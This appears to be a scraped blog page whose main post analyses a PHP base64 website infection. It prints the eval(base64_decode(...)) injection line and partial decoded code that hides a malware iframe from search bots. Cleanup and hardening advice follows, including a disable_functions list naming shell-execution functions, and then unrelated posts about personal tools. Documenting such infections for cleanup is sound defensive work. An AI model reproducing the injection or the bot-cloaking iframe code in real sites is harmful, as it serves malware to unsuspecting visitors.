PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:

    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="" width="2" height="2"></ΙFRAME>

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

in your webroot put a .htaccess file with the following content:
order deny,allow
deny from all
allow from

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need, for example some template systems use eval().

Change your file permissions!

Install and configure suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.


Interesting readings


Achievement generator

There used to be a very pretty achievements generator at

But apparently it broke because of some missing JavaScript and CSS files.

Using I’ve managed to get those files.

Then I crammed everything together in one HTML file πŸ™‚



PS: you can just copy the HTML and run it locally or host it yourself πŸ˜‰

London: There and Back Again

I like London, great city, lot’s of stuff to do. But it’s not next door so that means traveling.

I prefer traveling cheap so most of the time I use Megabus πŸ˜› .

They’re a nice, low-budget bus company.

However their site makes it quite hard to get an overview of all the cheapest days.

So I’ve made a little tool for myself πŸ˜€